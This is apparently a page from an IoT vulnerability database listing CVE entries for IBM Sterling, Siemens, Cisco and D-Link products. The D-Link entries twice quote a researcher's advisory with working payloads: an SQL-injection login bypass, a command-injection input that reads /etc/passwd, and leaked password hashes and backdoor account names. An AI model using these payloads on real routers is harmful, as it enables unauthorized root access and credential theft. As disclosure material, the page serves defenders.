VARIoT IoT vulnerabilities database


VAR-201312-0171 CVE-2013-5405 IBM Sterling B2B Integrator and Sterling File Gateway cross-site scripting vulnerability CVSS V2: 3.5
CVSS V3: -
Severity: LOW
Multiple cross-site scripting (XSS) vulnerabilities in IBM Sterling B2B Integrator 5.2 and Sterling File Gateway 2.2 allow remote authenticated users to inject arbitrary web script or HTML via unspecified parameters. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. IBM Sterling File Gateway is a set of file transfer software that integrates different file transfer methods and can realize secure interaction through the network
VAR-201312-0172 CVE-2013-5406 IBM Sterling B2B Integrator and Sterling File Gateway cross-site scripting vulnerability CVSS V2: 3.5
CVSS V3: -
Severity: LOW
Multiple cross-site scripting (XSS) vulnerabilities in IBM Sterling B2B Integrator 5.2 and Sterling File Gateway 2.2 allow remote authenticated users to inject arbitrary web script or HTML via unspecified parameters, leading to improper interaction with the Windows MHTML protocol handler. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. The following product versions are vulnerable: IBM Sterling B2B Integrator 5.2 IBM Sterling File Gateway 2.2. IBM Sterling File Gateway is a set of file transfer software that integrates different file transfer methods and can realize secure interaction through the network. A remote attacker can exploit this vulnerability to inject arbitrary web script or HTML with specially crafted parameters
VAR-201312-0173 CVE-2013-5407 IBM Sterling B2B Integrator and Sterling File Gateway access restriction bypass vulnerability CVSS V2: 4.9
CVSS V3: -
Severity: MEDIUM
IBM Sterling B2B Integrator 5.2 and Sterling File Gateway 2.2 do not properly restrict use of FRAME elements, which allows remote authenticated users to bypass intended access restrictions or obtain sensitive information via a crafted web site, related to a "frame injection" issue. IBM Sterling B2B Integrator and IBM Sterling File Gateway are prone to an unspecified frame-injection vulnerability. An attacker can exploit this issue to conduct phishing attacks. Successful exploits will allow the attacker to gain unauthorized access or obtain sensitive information. The following product versions are vulnerable: IBM Sterling B2B Integrator 5.2 IBM Sterling File Gateway 2.2. IBM Sterling File Gateway is a set of file transfer software that integrates different file transfer methods and can realize secure interaction through the network. The vulnerability stems from the fact that the program does not properly restrict the use of FRAME elements
VAR-201312-0174 CVE-2013-5409 IBM Sterling B2B Integrator and Sterling File Gateway SQL injection vulnerability CVSS V2: 6.5
CVSS V3: -
Severity: MEDIUM
Multiple SQL injection vulnerabilities in IBM Sterling B2B Integrator 5.2 and Sterling File Gateway 2.2 allow remote authenticated users to execute arbitrary SQL commands via unspecified vectors. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. IBM Sterling File Gateway is a set of file transfer software that integrates different file transfer methods and can realize secure interaction through the network. A remote attacker can exploit this vulnerability to execute arbitrary SQL commands
VAR-201312-0175 CVE-2013-5411 IBM Sterling B2B Integrator and Sterling File Gateway link injection vulnerability CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
IBM Sterling B2B Integrator 5.2 and Sterling File Gateway 2.2 allow remote attackers to inject links and trigger unintended navigation or actions via unspecified vectors. Attackers can exploit this issue to inject arbitrary links to different pages within the application. This may allow an attacker to perform phishing attacks by presenting false information that may appear to be legitimate application pages. IBM Sterling File Gateway is a set of file transfer software that integrates different file transfer methods and can realize secure interaction through the network. A remote attacker could exploit this vulnerability to inject links and trigger users to navigate to malicious websites or perform malicious actions
VAR-201312-0176 CVE-2013-5413 IBM Sterling B2B Integrator and Sterling File Gateway authentication bypass vulnerability CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
IBM Sterling B2B Integrator 5.2 and Sterling File Gateway 2.2 do not invalidate a session upon a logout action, which allows remote attackers to bypass authentication by leveraging an unattended workstation. Local attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions. IBM Sterling File Gateway is a set of file transfer software that integrates different file transfer methods and can realize secure interaction through the network. A remote attacker could exploit this vulnerability to bypass authentication
VAR-201312-0272 CVE-2013-6920 Siemens SINAMICS S/G Security Bypass Vulnerability CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
Siemens SINAMICS S/G controllers with firmware before 4.6.11 do not require authentication for FTP and TELNET sessions, which allows remote attackers to bypass intended access restrictions via TCP traffic to port (1) 21 or (2) 23. Siemens SINAMICS S/G is a frequency converter developed by Siemens and is mainly used for mechanical engineering and plant construction. Siemens SINAMICS S/G are prone to a remote security bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and execute administrative commands without proper credentials. Siemens SINAMICS S/G running firmware versions prior to 4.6.11 are vulnerable. The vulnerability stems from the fact that FTP and TELNET sessions do not perform authentication operations
VAR-201312-0451 CVE-2013-6702 Cisco ONS 15454 controller card software management implementation denial of service (DoS) vulnerability CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902. An attacker can exploit this issue to cause the control card to reset, denying service to legitimate users. This issue is being tracked by Cisco bug IDs CSCtz50902 and CSCuh89020. Cisco ONS 15454 is an optical multi-service transport platform from Cisco. The platform leverages optical transport technologies such as Resilient Packet Ring (RPR), SDH, and DWDM/CWDM to integrate Ethernet, IP, storage, and TDM services to deliver next-generation voice, data services, and more. The Controller Cards are the platform's control cards.
VAR-201312-0198 CVE-2013-5946 Multiple D-Link router products: arbitrary command execution vulnerability in firmware CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
The runShellCmd function in systemCheck.htm in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) "Ping or Trace an IP Address" or (2) "Perform a DNS Lookup" section. D-Link DSR is a wireless service router product. There is a remote arbitrary command execution vulnerability in the implementation of the D-Link DSR router family. Successful use can allow an attacker to execute arbitrary commands with root privileges. The following products and versions are affected: DSR-150 with firmware version 1.08B29 and earlier; DSR-150N with firmware version 1.05B51 and earlier; DSR-250 and DSR-250N with firmware version 1.08B39 and earlier; DSR-500, DSR-500N, DSR-1000, DSR-1000N with previous firmware versions.

#
# CVEs:
# CVE-2013-5945 - Authentication Bypass by SQL-Injection
# CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution
#
# Vulnerable Routers:
# D-Link DSR-150 (Firmware < v1.08B44)
# D-Link DSR-150N (Firmware < v1.05B64)
# D-Link DSR-250 and DSR-250N (Firmware < v1.08B44)
# D-Link DSR-500 and DSR-500N (Firmware < v1.08B77)
# D-Link DSR-1000 and DSR-1000N (Firmware < v1.08B77)
#
# Download URL:
# http://tsd.dlink.com.tw
#
# Arch:
# mips and armv6l, Linux
#
# Author:
# 0_o -- null_null
# nu11.nu11 [at] yahoo.com
#
# Date:
# 2013-08-18
#
# Purpose:
# Get a non-persistent root shell on your D-Link DSR.
#
# Prerequisites:
# Network access to the router ports 443 and 23.
# !!! NO AUTHENTICATION CREDENTIALS REQUIRED !!!
#
#
# A list of identified vulns follows. This list is not exhaustive as I assume
# more vulns are present that just slipped my attention.
# The fact that D-Link implemented a backdoor user (for what reason, please??)
# and just renamed it instead of completely removing it after it was targeted
# by my previous exploit, as well as the triviality of those vulns I found
# makes me suggest that more vulns are present that are comparably easy to
# exploit.
#
# Since 2013-12-03, patches are available for:
# DSR-150: Firmware v1.08B44
# DSR-150N: Firmware v1.05B64
# DSR-250 and DSR-250N: Firmware v1.08B44
# DSR-500 and DSR-500N: Firmware v1.08B77
# DSR-1000 and DSR-1000N: Firmware v1.08B77
# via http://tsd.dlink.com.tw
#
# And now, have a worthwhile read :-)
#

0. Contents:

1. Vulnerability: Authentication Bypass by SQL-Injection (CVE-2013-5945)
2. Vulnerability: Privilege Escalation by Arbitrary Command Execution (CVE-2013-5946)
3. Exposure: D-Link backdoor user
4. Vulnerability: Use of weak hash algorithms
5. Exposure: Passwords are stored as plain text in config files
6. Vulnerability: Bad permissions on /etc/shadow

1. Vulnerability: Authentication Bypass by SQL-Injection (CVE-2013-5945)

* Possible via the global webUI login form.

* File /pfrm2.0/share/lua/5.1/teamf1lualib/login.lua contains:

function login.authenticate(tablename, tableInput)
  local username = tableInput["Users.UserName"]
  local password = tableInput["Users.Password"]
  local cur = db.execute(string.format([[
    SELECT *, ROWID AS _ROWID_ FROM %s WHERE %s = '%s' AND %s = '%s'
  ]], tablename, "UserName", username, "Password", password))
  local result = false
  local statusCode = "NONE"
  if cur then
    local row = cur:fetch({}, "a")
    cur:close()
    result = row ~= nil
    if result == false then
      statusCode = "USER_LOGIN_INVALID_PASSWORD"
    end
  end
  return result, statusCode
end

* This function creates an SQL statement of the form:

SELECT * FROM "Users" WHERE "UserName" = 'user' AND "Password" = 'pass';

* Since there is a default admin user account called "admin" around, this is easily exploitable by providing this to the login form:

username = admin
password = ' or 'a'='a

* ...resulting in this SQL statement:

SELECT * FROM "Users" WHERE "UserName" = 'admin' AND "Password" = '' or 'a'='a';

* Old school SQL injection. Ohh, by the way...

* The same fault can be found in captivePortal.lua -- FREE NETWORKS FOR EVERYONE --

2. Vulnerability: Privilege Escalation by Arbitrary Command Execution (CVE-2013-5946)

* Possible from the Tools --> System Check page.

* File /pfrm2.0/var/www/systemCheck.htm contains:

local function runShellCmd(command)
  local pipe = io.popen(command .. " 2>&1") -- redirect stderr to stdout
  local cmdOutput = pipe:read("*a")
  pipe:close()
  return cmdOutput
end

if (ButtonType and ButtonType == "ping") then
  [...]
  local cmd_ping = pingprog .. " " .. ipToPing .. " " .. options1 .. " > " .. pingfile
  globalCmdOutput = runShellCmd (cmd_ping)
  statusMessage = "Pinging " .. ipToPing
  [...]
elseif (ButtonType and ButtonType == "traceroute") then
  [...]
  local cmd = traceRouteProg .. " " .. ipToTraceRoute .. options
  globalCmdOutput = runShellCmd(cmd)
  statusMessage = "Traceroute To " .. ipToTraceRoute .. "..."
  [...]
elseif (ButtonType and ButtonType == "dnslookup") then
  [...]
  util.appendDebugOut("Exec = " .. os.execute(nsLookupProg .. " " .. internetNameToNsLookup .. " > " .. nsLookupFile))
  statusMessage = "DNS Lookup for " .. internetNameToNsLookup
  [...]

* Command injection is possible in at least these form sections:
  Ping or Trace an IP Address
  Perform a DNS Lookup

* When using a browser, deactivate the "onclick" JavaScript checks using a tool like Firebug. Tools like curl are not hindered by these checks.

* All forms allow input like this:
  localhost;<command>
  example: localhost;cat /etc/passwd

* This user provided value is then directly used as part of the input for the call to runShellCmd(c) and thus io.popen(c) in the first form section and os.execute(c) in the second form section.

* Output from user provided commands gets displayed on the next page beneath the benign command output. example:

[...]
<textarea rows="15" name="S1" cols="60" wrap="off" class="txtbox1">
traceroute to localhost (127.0.0.1), 10 hops max, 40 byte packets
 1 localhost (127.0.0.1) 0.429 ms 0.255 ms 0.224 ms
root:!:0:0:root:/root:/bin/sh
gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/nonexistent:/bin/false
ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh
guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
admin:x:0:2:Linux User,,,:/home/admin:/bin/sh
</textarea>
[...]

3. Exposure: D-Link backdoor user:

* This was the contents of my /etc/passwd after I upgraded to 1.08B39_WW:

root:!:0:0:root:/root:/bin/sh
gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/nonexistent:/bin/false
ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh
guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
admin:x:0:2:Linux User,,,:/home/admin:/bin/sh

* You can see the old D-Link backdoor user name "ZX4q9Q9JUpwTZuo7". That was the account I hacked before with my previous exploit: http://www.exploit-db.com/papers/22930/ And there is a new backdoor user "gkJ9232xXyruTRmY" introduced. Instead of removing the backdoor, D-Link just created a new one.

* I verified this by showing the /etc/profile:

# /etc/profile
LD_LIBRARY_PATH=.:/pfrm2.0/lib:/lib
PATH=.:/pfrm2.0/bin:$PATH
CLISH_PATH=/etc/clish
export PATH LD_LIBRARY_PATH CLISH_PATH
# redirect all users except root to CLI
if [ "$USER" != "gkJ9232xXyruTRmY" ] ; then
  trap "/bin/login" SIGINT
  trap "" SIGTSTP
  /pfrm2.0/bin/cli
  exit
fi
PS1='DSR-250N> '

4. Vulnerability: Use of weak hash algorithms:

* In the /etc/shadow, salted DES hashes are used to store user passwords. Since this hash type supports at most 8 characters, users can log in by just typing the first 8 letters of their passwords when using SSH or telnet.

* An effective password length limitation of 8 characters makes brute force attacks on user accounts very feasible, even if the user chose a longer password.

5. Exposure: Passwords are stored as plain text in config files:

* A lookup into the system config file /tmp/teamf1.cfg.ascii, from which the /tmp/system.db is built on boot time, reveals that all user passwords are stored in plain text. Example:

[...]
Users = {}
Users[1] = {}
Users[1]["Capabilities"] = ""
Users[1]["DefaultUser"] = "1"
Users[1]["UserId"] = "1"
Users[1]["FirstName"] = "backdoor"
Users[1]["OID"] = "0"
Users[1]["GroupId"] = "1"
Users[1]["UserName"] = "gkJ9232xXyruTRmY"
Users[1]["Password"] = "thisobviouslyisafakepass"
Users[1]["UserTimeOut"] = "10"
Users[1]["_ROWID_"] = "1"
Users[1]["LastName"] = "ssl"
[...]

6. Vulnerability: Bad permissions on /etc/shadow

* This file should have 600 permissions set and not 644. It is world readable. Pointless, since every process runs as root, no user separation is done anyway.

DSR-250N> ls -l -a /etc/shadow
-rw-r--r-- 1 root root 115 Sep 27 15:07 /etc/shadow
DSR-250N> ps
PID USER VSZ STAT COMMAND
1 root 2700 S init
2 root 0 SW< [kthreadd]
3 root 0 SW< [ksoftirqd/0]
4 root 0 SW< [events/0]
5 root 0 SW< [khelper]
8 root 0 SW< [async/mgr]
111 root 0 SW< [kblockd/0]
120 root 0 SW< [khubd]
123 root 0 SW< [kseriod]
128 root 0 SW< [kslowd]
129 root 0 SW< [kslowd]
150 root 0 SW [pdflush]
151 root 0 SW [pdflush]
152 root 0 SW< [kswapd0]
200 root 0 SW< [aio/0]
210 root 0 SW< [nfsiod]
220 root 0 SW< [crypto/0]
230 root 0 SW< [cns3xxx_spi.0]
781 root 0 SW< [mtdblockd]
860 root 0 SW< [usbhid_resumer]
874 root 0 SW< [rpciod/0]
903 root 0 SWN [jffs2_gcd_mtd4]
909 root 0 SWN [jffs2_gcd_mtd5]
918 root 3596 S unionfs -s -o cow,nonempty,allow_other /rw_pfrm2.0=R
999 root 1816 S < /pfrm2.0/udev/sbin/udevd --daemon
1002 root 2988 S /pfrm2.0/bin/platformd /tmp/system.db
1003 root 3120 S /pfrm2.0/bin/evtDsptchd /tmp/system.db
1049 root 2704 S /usr/sbin/telnetd -l /bin/login
1097 root 4560 S /pfrm2.0/bin/wlanClientArlFlushd
1141 root 37000 S /pfrm2.0/bin/sshd
1154 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN1 5
1255 root 3148 S /pfrm2.0/bin/nimfd /tmp/system.db
1259 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN2 5
1375 root 3588 S /pfrm2.0/bin/firewalld /tmp/system.db
1560 root 0 SW< [key_timehandler]
1598 root 7776 S /pfrm2.0/bin/racoon -a 8787 -f /var/racoon_path.conf
1600 root 8036 S rvgd /tmp/system.db
1612 root 0 SW [cavium]
1621 root 8424 S vpnKAd /tmp/system.db
1685 root 5372 S /pfrm2.0/sslvpn/bin/firebase -d
1702 root 5016 S /pfrm2.0/sslvpn/bin/smm -d
1711 root 6052 S /pfrm2.0/sslvpn/bin/httpd
1712 root 2700 S /bin/sh /var/sslvpn/var/httpdKeepAlive.sh
1771 root 2680 S /pfrm2.0/bin/statusD
1933 root 3092 S /pfrm2.0/bin/loggingd /tmp/system.db
1960 root 5284 S /pfrm2.0/bin/radEap -d /tmp/system.db
1962 root 2988 S /pfrm2.0/bin/rebootd /tmp/system.db
2004 root 2988 S /pfrm2.0/bin/crond /tmp/system.db
2008 root 3260 S /pfrm2.0/bin/ntpd /tmp/system.db
2196 root 3128 S /pfrm2.0/bin/intelAmtd /tmp/system.db
2205 root 1904 S /pfrm2.0/bin/fReset
2311 root 2704 S /bin/sh /pfrm2.0/bin/release_cache.sh
2312 root 2704 S /sbin/getty -L ttyS0 115200 vt100
2463 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg30 -lf /va
2481 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg50 -lf /va
3355 root 1768 S /pfrm2.0/bin/rt2860apd
3443 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg40 -lf /va
3451 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg20 -lf /va
3457 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg1 -lf /var
3484 root 7836 S /pfrm2.0/bin/snmpd -p /var/run/snmp.pid
3518 root 4424 S /pfrm2.0/bin/openvpn --config /var/openvpn/openvpn.c
3630 root 1928 S /pfrm2.0/bin/dnsmasq --dns-forward-max=10000 --addn-
5353 root 2704 S -sh
7877 root 2568 S sleep 60
7953 root 2568 S sleep 60
8008 root 2704 R ps
16749 root 2704 S -sh
25690 root 0 SW< [RtmpCmdQTask]
25692 root 0 SW< [RtmpWscTask]
DSR-250N>
VAR-202002-0660 CVE-2013-5945 Multiple D-Link products: SQL injection vulnerability CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
Multiple SQL injection vulnerabilities in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allow remote attackers to execute arbitrary SQL commands via the password to (1) the login.authenticate function in share/lua/5.1/teamf1lualib/login.lua or (2) captivePortal.lua. Multiple D-Link products contain an SQL injection vulnerability; information may be obtained or tampered with, and the service may be put into a denial-of-service (DoS) state. D-Link DSR is a wireless service router product. The successful use of the SQL injection vulnerability in the D-Link DSR router family enables attackers to control applications, access or modify data, and exploit other vulnerabilities in the underlying database to bypass authentication. D-Link DSR Router Series are prone to an SQL-injection vulnerability.

#
# CVEs:
# CVE-2013-5945 - Authentication Bypass by SQL-Injection
# CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution
#
# Vulnerable Routers:
# D-Link DSR-150 (Firmware < v1.08B44)
# D-Link DSR-150N (Firmware < v1.05B64)
# D-Link DSR-250 and DSR-250N (Firmware < v1.08B44)
# D-Link DSR-500 and DSR-500N (Firmware < v1.08B77)
# D-Link DSR-1000 and DSR-1000N (Firmware < v1.08B77)
#
# Download URL:
# http://tsd.dlink.com.tw
#
# Arch:
# mips and armv6l, Linux
#
# Author:
# 0_o -- null_null
# nu11.nu11 [at] yahoo.com
#
# Date:
# 2013-08-18
#
# Purpose:
# Get a non-persistent root shell on your D-Link DSR.
#
# Prerequisites:
# Network access to the router ports 443 and 23.
# !!! NO AUTHENTICATION CREDENTIALS REQUIRED !!!
#
#
# A list of identified vulns follows. This list is not exhaustive as I assume
# more vulns are present that just slipped my attention.
# The fact that D-Link implemented a backdoor user (for what reason, please??)
# and just renamed it instead of completely removing it after it was targeted
# by my previous exploit, as well as the triviality of those vulns I found
# makes me suggest that more vulns are present that are comparably easy to
# exploit.
#
# Since 2013-12-03, patches are available for:
# DSR-150: Firmware v1.08B44
# DSR-150N: Firmware v1.05B64
# DSR-250 and DSR-250N: Firmware v1.08B44
# DSR-500 and DSR-500N: Firmware v1.08B77
# DSR-1000 and DSR-1000N: Firmware v1.08B77
# via http://tsd.dlink.com.tw
#
# And now, have a worthwhile read :-)
#

0. Contents:

1. Vulnerability: Authentication Bypass by SQL-Injection (CVE-2013-5945)
2. Vulnerability: Privilege Escalation by Arbitrary Command Execution (CVE-2013-5946)
3. Exposure: D-Link backdoor user
4. Vulnerability: Use of weak hash algorithms
5. Exposure: Passwords are stored as plain text in config files
6. Vulnerability: Bad permissions on /etc/shadow

1. Vulnerability: Authentication Bypass by SQL-Injection (CVE-2013-5945)

* Possible via the global webUI login form.

* File /pfrm2.0/share/lua/5.1/teamf1lualib/login.lua contains:

function login.authenticate(tablename, tableInput)
  local username = tableInput["Users.UserName"]
  local password = tableInput["Users.Password"]
  local cur = db.execute(string.format([[
    SELECT *, ROWID AS _ROWID_ FROM %s WHERE %s = '%s' AND %s = '%s'
  ]], tablename, "UserName", username, "Password", password))
  local result = false
  local statusCode = "NONE"
  if cur then
    local row = cur:fetch({}, "a")
    cur:close()
    result = row ~= nil
    if result == false then
      statusCode = "USER_LOGIN_INVALID_PASSWORD"
    end
  end
  return result, statusCode
end

* This function creates an SQL statement of the form:

SELECT * FROM "Users" WHERE "UserName" = 'user' AND "Password" = 'pass';

* Since there is a default admin user account called "admin" around, this is easily exploitable by providing this to the login form:

username = admin
password = ' or 'a'='a

* ...resulting in this SQL statement:

SELECT * FROM "Users" WHERE "UserName" = 'admin' AND "Password" = '' or 'a'='a';

* Old school SQL injection. Ohh, by the way...

* The same fault can be found in captivePortal.lua -- FREE NETWORKS FOR EVERYONE --

2. Vulnerability: Privilege Escalation by Arbitrary Command Execution (CVE-2013-5946)

* Possible from the Tools --> System Check page.

* File /pfrm2.0/var/www/systemCheck.htm contains:

local function runShellCmd(command)
  local pipe = io.popen(command .. " 2>&1") -- redirect stderr to stdout
  local cmdOutput = pipe:read("*a")
  pipe:close()
  return cmdOutput
end

if (ButtonType and ButtonType == "ping") then
  [...]
  local cmd_ping = pingprog .. " " .. ipToPing .. " " .. options1 .. " > " .. pingfile
  globalCmdOutput = runShellCmd (cmd_ping)
  statusMessage = "Pinging " .. ipToPing
  [...]
elseif (ButtonType and ButtonType == "traceroute") then
  [...]
  local cmd = traceRouteProg .. " " .. ipToTraceRoute .. options
  globalCmdOutput = runShellCmd(cmd)
  statusMessage = "Traceroute To " .. ipToTraceRoute .. "..."
  [...]
elseif (ButtonType and ButtonType == "dnslookup") then
  [...]
  util.appendDebugOut("Exec = " .. os.execute(nsLookupProg .. " " .. internetNameToNsLookup .. " > " .. nsLookupFile))
  statusMessage = "DNS Lookup for " .. internetNameToNsLookup
  [...]

* Command injection is possible in at least these form sections:
  Ping or Trace an IP Address
  Perform a DNS Lookup

* When using a browser, deactivate the "onclick" JavaScript checks using a tool like Firebug. Tools like curl are not hindered by these checks.

* All forms allow input like this:
  localhost;<command>
  example: localhost;cat /etc/passwd

* This user provided value is then directly used as part of the input for the call to runShellCmd(c) and thus io.popen(c) in the first form section and os.execute(c) in the second form section.

* Output from user provided commands gets displayed on the next page beneath the benign command output. example:

[...]
<textarea rows="15" name="S1" cols="60" wrap="off" class="txtbox1">
traceroute to localhost (127.0.0.1), 10 hops max, 40 byte packets
 1 localhost (127.0.0.1) 0.429 ms 0.255 ms 0.224 ms
root:!:0:0:root:/root:/bin/sh
gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/nonexistent:/bin/false
ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh
guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
admin:x:0:2:Linux User,,,:/home/admin:/bin/sh
</textarea>
[...]

3. Exposure: D-Link backdoor user:

* This was the contents of my /etc/passwd after I upgraded to 1.08B39_WW:

root:!:0:0:root:/root:/bin/sh
gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/nonexistent:/bin/false
ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh
guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
admin:x:0:2:Linux User,,,:/home/admin:/bin/sh

* You can see the old D-Link backdoor user name "ZX4q9Q9JUpwTZuo7". That was the account I hacked before with my previous exploit: http://www.exploit-db.com/papers/22930/ And there is a new backdoor user "gkJ9232xXyruTRmY" introduced. Instead of removing the backdoor, D-Link just created a new one.

* I verified this by showing the /etc/profile:

# /etc/profile
LD_LIBRARY_PATH=.:/pfrm2.0/lib:/lib
PATH=.:/pfrm2.0/bin:$PATH
CLISH_PATH=/etc/clish
export PATH LD_LIBRARY_PATH CLISH_PATH
# redirect all users except root to CLI
if [ "$USER" != "gkJ9232xXyruTRmY" ] ; then
  trap "/bin/login" SIGINT
  trap "" SIGTSTP
  /pfrm2.0/bin/cli
  exit
fi
PS1='DSR-250N> '

4. Vulnerability: Use of weak hash algorithms:

* In the /etc/shadow, salted DES hashes are used to store user passwords. Since this hash type supports at most 8 characters, users can log in by just typing the first 8 letters of their passwords when using SSH or telnet.

* An effective password length limitation of 8 characters makes brute force attacks on user accounts very feasible, even if the user chose a longer password.

5. Exposure: Passwords are stored as plain text in config files:

* A lookup into the system config file /tmp/teamf1.cfg.ascii, from which the /tmp/system.db is built on boot time, reveals that all user passwords are stored in plain text. Example:

[...]
Users = {}
Users[1] = {}
Users[1]["Capabilities"] = ""
Users[1]["DefaultUser"] = "1"
Users[1]["UserId"] = "1"
Users[1]["FirstName"] = "backdoor"
Users[1]["OID"] = "0"
Users[1]["GroupId"] = "1"
Users[1]["UserName"] = "gkJ9232xXyruTRmY"
Users[1]["Password"] = "thisobviouslyisafakepass"
Users[1]["UserTimeOut"] = "10"
Users[1]["_ROWID_"] = "1"
Users[1]["LastName"] = "ssl"
[...]

6. Vulnerability: Bad permissions on /etc/shadow

* This file should have 600 permissions set and not 644. It is world readable. Pointless, since every process runs as root, no user separation is done anyway.

DSR-250N> ls -l -a /etc/shadow
-rw-r--r-- 1 root root 115 Sep 27 15:07 /etc/shadow
DSR-250N> ps
PID USER VSZ STAT COMMAND
1 root 2700 S init
2 root 0 SW< [kthreadd]
3 root 0 SW< [ksoftirqd/0]
4 root 0 SW< [events/0]
5 root 0 SW< [khelper]
8 root 0 SW< [async/mgr]
111 root 0 SW< [kblockd/0]
120 root 0 SW< [khubd]
123 root 0 SW< [kseriod]
128 root 0 SW< [kslowd]
129 root 0 SW< [kslowd]
150 root 0 SW [pdflush]
151 root 0 SW [pdflush]
152 root 0 SW< [kswapd0]
200 root 0 SW< [aio/0]
210 root 0 SW< [nfsiod]
220 root 0 SW< [crypto/0]
230 root 0 SW< [cns3xxx_spi.0]
781 root 0 SW< [mtdblockd]
860 root 0 SW< [usbhid_resumer]
874 root 0 SW< [rpciod/0]
903 root 0 SWN [jffs2_gcd_mtd4]
909 root 0 SWN [jffs2_gcd_mtd5]
918 root 3596 S unionfs -s -o cow,nonempty,allow_other /rw_pfrm2.0=R
999 root 1816 S < /pfrm2.0/udev/sbin/udevd --daemon
1002 root 2988 S /pfrm2.0/bin/platformd /tmp/system.db
1003 root 3120 S /pfrm2.0/bin/evtDsptchd /tmp/system.db
1049 root 2704 S /usr/sbin/telnetd -l /bin/login
1097 root 4560 S /pfrm2.0/bin/wlanClientArlFlushd
1141 root 37000 S /pfrm2.0/bin/sshd
1154 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN1 5
1255 root 3148 S /pfrm2.0/bin/nimfd /tmp/system.db
1259 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN2 5
1375 root 3588 S /pfrm2.0/bin/firewalld /tmp/system.db
1560 root 0 SW< [key_timehandler]
1598 root 7776 S /pfrm2.0/bin/racoon -a 8787 -f /var/racoon_path.conf
1600 root 8036 S rvgd /tmp/system.db
1612 root 0 SW [cavium]
1621 root 8424 S vpnKAd /tmp/system.db
1685 root 5372 S /pfrm2.0/sslvpn/bin/firebase -d
1702 root 5016 S /pfrm2.0/sslvpn/bin/smm -d
1711 root 6052 S /pfrm2.0/sslvpn/bin/httpd
1712 root 2700 S /bin/sh /var/sslvpn/var/httpdKeepAlive.sh
1771 root 2680 S /pfrm2.0/bin/statusD
1933 root 3092 S /pfrm2.0/bin/loggingd /tmp/system.db
1960 root 5284 S /pfrm2.0/bin/radEap -d /tmp/system.db
1962 root 2988 S /pfrm2.0/bin/rebootd /tmp/system.db
2004 root 2988 S /pfrm2.0/bin/crond /tmp/system.db
2008 root 3260 S /pfrm2.0/bin/ntpd /tmp/system.db
2196 root 3128 S /pfrm2.0/bin/intelAmtd /tmp/system.db
2205 root 1904 S /pfrm2.0/bin/fReset
2311 root 2704 S /bin/sh /pfrm2.0/bin/release_cache.sh
2312 root 2704 S /sbin/getty -L ttyS0 115200 vt100
2463 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg30 -lf /va
2481 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg50 -lf /va
3355 root 1768 S /pfrm2.0/bin/rt2860apd
3443 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg40 -lf /va
3451 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg20 -lf /va
3457 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg1 -lf /var
3484 root 7836 S /pfrm2.0/bin/snmpd -p /var/run/snmp.pid
3518 root 4424 S /pfrm2.0/bin/openvpn --config /var/openvpn/openvpn.c
3630 root 1928 S /pfrm2.0/bin/dnsmasq --dns-forward-max=10000 --addn-
